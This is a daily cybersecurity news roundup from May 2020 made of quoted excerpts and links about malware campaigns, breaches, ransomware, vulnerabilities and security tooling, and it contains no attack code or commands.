Cyber Security News for 28May2020

#security #cybersecurity #itsecurity #privacy #risk #compliance #openssh #threathunting #valak #malware #vandathegod #immuniweb #redelk #ansible #redteam #devops #cybercrime #robertoescobar #apple #ponyfinal #googletag #netwalker #raas #bluemockingbird #trickbot #mworm #nworm #pagelayer #wordpress #exim #sandwormteam  #valorant #Hoaxcalls #botnet
Image by https://tripwire.com
  1. “Cyber criminals create fake online stores that mimic the look of real sites or that use the names of well-known stores or brands. When you search for the best online deals, you may find yourself at one of these fake sites. By purchasing from such websites, you can end up with counterfeit or stolen items, and in some cases, your purchases might never be delivered.” https://www.sans.org/security-awareness-training/resources/shopping-online-securely-1
  2. “The truth is that the impetus to scale up quickly has left many organisations without a complete inventory of what devices are now within their corporate infrastructure. Organizations, therefore, need a way of passively discovering a complete list of their assets within a short amount of time.” https://www.tripwire.com/state-of-security/featured/business-continuity-infrastructure-continuity-remote-working/
  3. “About 150 organizations in the financial, retail, manufacturing, and health care sectors have been targeted by the Valak malware since it emerged late last year, the researchers said. More than just a “loader” that delivers malicious code, Valak can also be used to siphon off data from enterprise networks, they concluded. In more than two-thirds of the attacks, Valak was still being delivered with other pieces of malware.” https://www.cyberscoop.com/valak-malware-cybereason-data-theft/
  4. “Organizations can adopt two cybersecurity stances to strengthen and improve their cybersecurity posture; the first (reactive), is to acquire traditional detection and prevention methods such as IDS, IPS, firewalls, and SIEM whereas the second (proactive) is to use offensive tactics, i.e. those found in threat-hunting programs.” https://www.threathunting.se/2020/05/28/who-is-a-threat-hunter-and-what-role-do-they-play/
  5. “OpenSSH, the most popular utility for connecting to and managing remote servers, has announced today plans to drop support for its SHA-1 authentication scheme.” https://www.blackhatethicalhacking.com/news/openssh-to-deprecate-sha-1-logins-due-to-security-risk/
  6. “It’s one thing for hackers to target websites and proudly announce it on social media platforms for all to see. It’s, however, an entirely different thing to leave a digital trail that leads cybersecurity researchers right to their doorsteps.  That’s exactly what happened in the case of a hacktivist under the name of VandaTheGod, who has been attributed to a series of attacks on government websites since July 2019.” https://thehackernews.com/2020/05/brazilian-hacker-vandathegod.html
  7. “ImmuniWeb says that its Deep Learning AI technology is capable of distinguishing and removing duplicates and fake records, providing actionable and risk-scored data to its clients.” https://thehackernews.com/2020/05/dark-web-monitoring-tool.html
  8. “As the red team infrastructure needs continue to expand (and grow more complicated), so does the need for infrastructure automation. Red teams are adopting DevOps to improve the speed at which their infrastructure is deployed, hence the rise in usage of tools such as Terraform and Ansible for red teams. In this post, we will use Ansible to deploy the RedELK infrastructure visibility tool across a red team infrastructure.” https://www.trustedsec.com/blog/automating-a-redelk-deployment-using-ansible/
  9. “In recent years, invading private networks has become a favorite pastime among cybercriminals. If unwelcome visitors are able to find their way onto your home network, the consequences can be far-reaching and difficult to remedy. Data theft, privacy breaches and compromised information are just a few potential consequences of failing to secure your home network. Fortunately, a little bit of forethought and security knowhow can go a long way when it comes to bolstering your network’s defenses. Anyone looking to keep cybercriminals and other third parties far away from their home network should consider the following measures.” https://hackercombat.com/effective-ways-to-bolster-your-home-networks-defenses/
  10. “Cybercrime is any criminal activity where the object as a target and/or tool is a computer or network device. Some cyber crimes directly attack computers or other devices to disable them. In others, computers are used for their purposes by cyber criminals to distribute malicious program codes, obtain illegal information, or to obtain cryptocurrency. Dividing cybercrimes into separate categories is not easy as there are many of them. That’s why students often ask professional help from a paper writing service when they need to write about cyber crimes.” https://hackercombat.com/the-process-of-investigating-cyber-crimes/
  11. “Roberto Escobar’s company has reportedly filed a $2.6 billion lawsuit against Apple for purportedly having lame-o security – security so bad, his address purportedly got leaked through FaceTime and has led to subsequent assassination attempts.” https://nakedsecurity.sophos.com/2020/05/28/pablo-escobars-brother-sues-apple-for-2-6b-over-facetime-flaw/
  12. “Microsoft Security Intelligence revealed it had observed human-operated campaigns laying in wait for the right moment to deploy PonyFinal ransomware as their final payload.  In their operations, the attackers used brute force attacks against a targeted organization’s systems management server as a means to initially gain access. They then deployed a VBScript to run a PowerShell reverse shell. This asset helped the malicious actors execute data dumps.” https://www.tripwire.com/state-of-security/security-data-protection/ponyfinal-ransomware-delivered-by-extended-human-operated-attacks/
  13. “The Google Threat Analysis Group (TAG) is a group inside the Google’s security team that tracks operations conducted by nation-state actors and cybercrime groups. Google TAG has published today its first TAG quarterly report, the Q1 2020 TAG Bulletin, that provides insights on the campaigns monitored in the first quarter of 2020.” https://securityaffairs.co/wordpress/103924/hacking/google-tag-report-q1.html
  14. Security intelligence — spanning across your entire security strategy — isn’t just for security operations and vulnerability management teams. It empowers security functions throughout the organization to make better, faster decisions and amplify their impact — all the way up to the CISO. Senior security leaders can leverage actionable intelligence to identify real risks and guide critical planning and investment decisions.” https://www.recordedfuture.com/security-decision-making/
  15. “Faced with a Godzilla-like rampage of coronavirus (COVID-19)-related cyber attacks, state and local governments are taking another run at Congress to help shore up their cybersecurity defenses with badly needed funding, a new report said.” https://www.msspalert.com/cybersecurity-markets/verticals/states-ask-congress-for-funding/
  16. “Cisco Talos is releasing the 1.0 beta version of Dynamic Data Resolver (DDR) — a plugin for IDA that makes reverse-engineering malware easier. DDR is using instrumentation techniques to resolve dynamic values at runtime from the sample. For the 1.0 release, we have fixed a couple of bugs, ported it to the latest IDA version, added multiple new features, plus a new installer script that automatically resolves all dependencies.” https://blog.talosintelligence.com/2020/05/dynamic-data-resolver-1-0.html
  17. “Security researchers have found a new malware that finds and backdoors open-source NetBeans projects hosted on the GitHub web-based code hosting platform to spread to Windows, Linux, and macOS systems and deploy a Remote Administration Tool (RAT).  The malware dubbed Octopus Scanner by researchers at the GitHub Security Lab compromises developers’ computers by infecting their NetBeans repositories after planting malicious payloads within JAR binaries, project files and dependencies, later spreading to downstream development systems.” https://www.bleepingcomputer.com/news/security/new-octopus-scanner-malware-spreads-via-github-supply-chain-attack/
  18. “The “synchronized and organized attack” on civilian infrastructure was aimed at disrupting the industrial computers that underpin Israeli water facilities, said Yigal Unna, head of Israel’s National Cyber Directorate, in the most extensive public comments from an Israeli official yet on the incident. Damage could have been done to those systems if Israeli authorities hadn’t foiled the attack, Unna claimed.” https://www.cyberscoop.com/israel-cyberattacks-water-iran-yigal-unna/
  19. “The lawsuit, filed against Google by Arizona’s Attorney General, alleges that the tech giant uses “deceptive and unfair conduct” to obtain users’ location data.  Google has been hit by a lawsuit alleging that it violates user privacy by collecting location data via various means – and claiming that Google makes it nearly “impossible” for users to opt out of such data tracking.” https://threatpost.com/google-location-tracking-arizona-lawsuit/156082/
  20. “Michigan State University received a deadline to pay ransomware attackers under the threat that files stolen from the institution’s network will be leaked to the public.  The demand is from Netwalker ransomware-as-a-service (RaaS) operators, a group that recently started to recruit skilled network intruders for their affiliate program.” https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/
  21. “This month news broke about a hacker group, namely Blue Mockingbird, exploiting a critical vulnerability in Microsoft IIS servers to plant Monero (XMR) cryptocurrency miners on compromised machines.  According to the security firm Red Canary, the estimated number of infections is thought to have surpassed 1,000.” https://www.bleepingcomputer.com/news/security/microsoft-iis-servers-hacked-by-blue-mockingbird-to-mine-monero/
  22. “Minted, a US-based marketplace for independent artists, has disclosed a data breach after a hacker sold a database containing 5 million user records on a dark web marketplace.  Minted is an online marketplace that allows independent artists to submit their art, which is then voted on by the Minted community. The winning submissions are then sold as art, home décor, and stationery to consumers.  Earlier this month, BleepingComputer reported that a hacking group named Shiny Hunters was selling the user records for eleven companies on a dark web marketplace. ”  https://www.bleepingcomputer.com/news/security/minted-discloses-data-breach-after-5m-user-records-sold-online/
  23. “First discovered in 2016, TrickBot is an information stealer that provides backdoor access sometimes used by criminal groups to distribute other malware. TrickBot uses modules to perform different functions, and one key function is propagating from an infected Windows client to a vulnerable Domain Controller (DC). TrickBot currently uses three modules for propagation. As early as April 2020, TrickBot updated one of its propagation modules known as “mworm” to a new module called “nworm.” Infections caused through nworm leave no artifacts on an infected DC, and they disappear after a reboot or shutdown.” https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/
  24. “Two high severity security vulnerabilities found in the PageLayer plugin can let attackers to potentially wipe the contents or take over WordPress sites using vulnerable plugin versions.  PageLayer is a WordPress plugin with over 200,000+ active installations according to numbers available on its WordPress plugins repository entry.  It can help users without developer or designer skills to build web pages using a browser-based drag-and-drop real-time editor.” https://www.bleepingcomputer.com/news/security/200k-sites-with-buggy-wordpress-plugin-exposed-to-wipe-attacks/
  25. “Russian military cyber actors, publicly known as Sandworm Team, have been exploiting a vulnerability in Exim mail transfer agent (MTA) software since at least last August.” reads the advisory published by the NSA. “The Russian actors, part of the General Staff Main Intelligence Directorate’s (GRU) Main Center for Special Technologies (GTsST), have used this exploit to add privileged users, disable network security settings, execute additional scripts for further network exploitation; pretty much any attacker’s dream access – as long as that network is using an unpatched version of Exim MTA.”  https://securityaffairs.co/wordpress/103948/apt/nsa-sandworm-exim-attacks.html
  26. “A judge in the U.S. District Court for the Eastern District of Virginia ruled Tuesday that attorneys suing Capital One on behalf of customers could review a copy of an incident response report to prepare for a possible trial. The Virginia-based bank had sought to keep the report private on the grounds that it was protected under legal doctrine. Yet U.S. Magistrate Judge John Anderson said the report, prepared by Mandiant, was the result of a business agreement, and that the legal doctrine argument was “unpersuasive.”” https://www.cyberscoop.com/capital-one-breach-mandiant-report-judge-ruling/
  27. “As the eagerly anticipated tactical FPS game Valorant ends their closed beta, a fake mobile version is being distributed that displays nothing but scams to those who install it.  Riot Game’s Valorant ended closed beta today as they prepare for their official launch on June 2nd, 2020. Initially being launched for the PC, Valorant is not available for mobile devices as of yet, though they have stated they are looking into it for the future” https://www.bleepingcomputer.com/news/security/fake-valorant-mobile-app-pushes-scams-on-eager-gamers/
  28. “Cisco said today that some of its Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE) backend servers were hacked by exploiting critical SaltStack vulnerabilities patched last month.” https://www.bleepingcomputer.com/news/security/cisco-hacked-by-exploiting-vulnerable-saltstack-servers/
  29. “The Hoaxcalls botnet, built to carry out large-scale distributed denial-of-service (DDoS) attacks, has been actively in development since the beginning of the year. One of its hallmarks is that it uses different vulnerability exploits for initial compromise.” https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/
  30. “Hackers earlier this month breached the computer systems of Japanese data-management company NTT Communications in an incident that could affect 621 clients, the company said Thursday.” https://www.cyberscoop.com/ntt-hack-japan-customer-data/

#security #cybersecurity #itsecurity #privacy #risk #compliance #openssh #threathunting #valak #malware #vandathegod #immuniweb #redelk #ansible #redteam #devops #cybercrime #robertoescobar #apple #ponyfinal #googletag #netwalker #raas #bluemockingbird #trickbot #mworm #nworm #pagelayer #wordpress #exim #sandwormteam  #valorant #Hoaxcalls #botnet